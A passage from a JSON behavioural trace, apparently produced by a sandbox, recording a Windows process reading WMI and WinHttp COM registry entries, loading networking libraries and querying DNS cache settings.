          "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:29,766",
        "eid": 209,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:29,766",
        "eid": 210,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:29,766",
        "eid": 211,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:29,781",
        "eid": 212,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:29,781",
        "eid": 213,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,781",
        "eid": 214,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\en-US",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,781",
        "eid": 215,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\en",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,781",
        "eid": 216,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{027947E1-D731-11CE-A357-000000000001}\\ProxyStubClsid32\\(Default)",
          "content": "{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,781",
        "eid": 217,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\ActivateOnHostFlags",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,781",
        "eid": 218,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,781",
        "eid": 219,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)",
          "content": "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,781",
        "eid": 220,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\InprocServer32",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,781",
        "eid": 221,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,781",
        "eid": 222,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)",
          "content": "%systemroot%\\system32\\wbem\\fastprox.dll"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,797",
        "eid": 223,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\ThreadingModel",
          "content": "Both"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,797",
        "eid": 224,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\ActivateOnHostFlags",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,797",
        "eid": 225,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,797",
        "eid": 226,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)",
          "content": "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,797",
        "eid": 227,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\InprocServer32",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,797",
        "eid": 228,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,797",
        "eid": 229,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)",
          "content": "%systemroot%\\system32\\wbem\\fastprox.dll"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,797",
        "eid": 230,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\ThreadingModel",
          "content": "Both"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,797",
        "eid": 231,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\AppID",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,797",
        "eid": 232,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32\\(Default)",
          "content": "{7C857801-7381-11CF-884D-00AA004B2E24}"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,797",
        "eid": 233,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32\\(Default)",
          "content": "{7C857801-7381-11CF-884D-00AA004B2E24}"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,812",
        "eid": 234,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64\\(Default)",
          "content": "C:\\Windows\\System32\\wbem\\wbemdisp.TLB"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:33,922",
        "eid": 235,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64\\(Default)",
          "content": "C:\\Windows\\System32\\wbem\\wbemdisp.TLB"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:33,922",
        "eid": 236,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64\\(Default)",
          "content": "C:\\Windows\\System32\\stdole2.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:33,922",
        "eid": 237,
        "data": {
          "file": "C:\\Windows\\System32\\stdole2.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:33,922",
        "eid": 238,
        "data": {
          "file": "C:\\Windows\\System32\\stdole2.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:33,937",
        "eid": 239,
        "data": {
          "file": "C:\\Windows\\System32\\stdole2.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:33,937",
        "eid": 240,
        "data": {
          "file": "C:\\Windows\\System32\\stdole2.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:33,937",
        "eid": 241,
        "data": {
          "file": "C:\\Windows\\System32\\stdole2.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:33,937",
        "eid": 242,
        "data": {
          "file": "C:\\Windows\\System32\\stdole2.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:33,937",
        "eid": 243,
        "data": {
          "file": "C:\\Windows\\System32\\stdole2.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:33,953",
        "eid": 244,
        "data": {
          "file": "C:\\Windows\\System32\\stdole2.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:33,953",
        "eid": 245,
        "data": {
          "file": "C:\\Windows\\System32\\stdole2.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:33,953",
        "eid": 246,
        "data": {
          "file": "C:\\Windows\\System32\\stdole2.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:33,953",
        "eid": 247,
        "data": {
          "file": "C:\\Windows\\System32\\stdole2.tlb"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:33,969",
        "eid": 248,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID\\(Default)",
          "content": "{2087c2f4-2cef-4953-a8ab-66779b670495}"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:33,969",
        "eid": 249,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID\\(Default)",
          "content": "{2087c2f4-2cef-4953-a8ab-66779b670495}"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:33,969",
        "eid": 250,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\ActivateOnHostFlags",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:33,969",
        "eid": 251,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\(Default)",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:33,969",
        "eid": 252,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\(Default)",
          "content": "WinHttpRequest Component version 5.1"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:33,969",
        "eid": 253,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\InprocServer32",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:33,969",
        "eid": 254,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\(Default)",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:33,969",
        "eid": 255,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\(Default)",
          "content": "%SystemRoot%\\system32\\winhttpcom.dll"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:33,969",
        "eid": 256,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\ThreadingModel",
          "content": "Apartment"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,984",
        "eid": 257,
        "data": {
          "file": "C:\\Windows\\System32\\winhttpcom.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffed5f30000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:33,984",
        "eid": 258,
        "data": {
          "file": "winhttp.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffed8a20000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:34,000",
        "eid": 259,
        "data": {
          "file": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffecb2e0000"
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,000",
        "eid": 260,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\TenantRestrictions\\Payload"
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,000",
        "eid": 261,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\TenantRestrictions\\Payload"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:34,000",
        "eid": 262,
        "data": {
          "file": "C:\\Windows\\System32\\mswsock.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee0260000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 263,
        "data": {
          "file": "C:\\Windows\\System32\\mswsock.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee0260000"
        }
      },
      {
        "event": "write",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 264,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 265,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryAdapterName",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 266,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DisableAdapterDomainName",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 267,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseDomainNameDevolution",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 268,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UseDomainNameDevolution",
          "content": "1"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 269,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DomainNameDevolutionLevel",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 270,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\PrioritizeRecordData",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 271,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\PrioritizeRecordData",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 272,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AllowUnqualifiedQuery",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 273,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\AllowUnqualifiedQuery",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 274,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AppendToMultiLabelName",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 275,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenBadTlds",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 276,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenUnreachableServers",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 277,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenDefaultServers",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 278,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DynamicServerQueryOrder",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 279,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\FilterClusterIp",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 280,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\WaitForNameErrorOnAll",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 281,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseEdns",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 282,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsSecureNameQueryFallback",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 283,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableDAForAllNetworks",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 284,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessQueryOrder",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 285,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryIpMatching",
          "content": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 286,
        "data": {
          "file": "C:\\Windows\\System32\\rasadhlp.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffed87c0000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 287,
        "data": {
          "file": null,
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 288,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationTtl",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 289,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationTTL",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 290,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationRefreshInterval",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 291,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationRefreshInterval",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 292,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationMaxAddressCount",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 293,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\MaxNumberOfAddressesToRegister",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 294,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateSecurityLevel",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 295,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UpdateSecurityLevel",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 296,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateTopLevelDomainZones",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 297,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DowncaseSpnCauseApiOwnerIsTooLazy",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 298,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationOverwrite",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 299,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheSize",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 300,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheTtl",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 301,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxNegativeCacheTtl",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 302,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AdapterTimeoutLimit",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 303,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ServerPriorityTimeLimit",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 304,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCachedSockets",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 305,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableServerUnreachability",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 306,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMulticast",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 307,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastResponderFlags",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 308,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderFlags",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 309,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderMaxTimeout",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 310,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMDNS",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 311,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsTest",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 312,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseCompartments",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 313,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\CacheAllCompartments",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:34,031",
        "eid": 314,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseNewRegistration",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
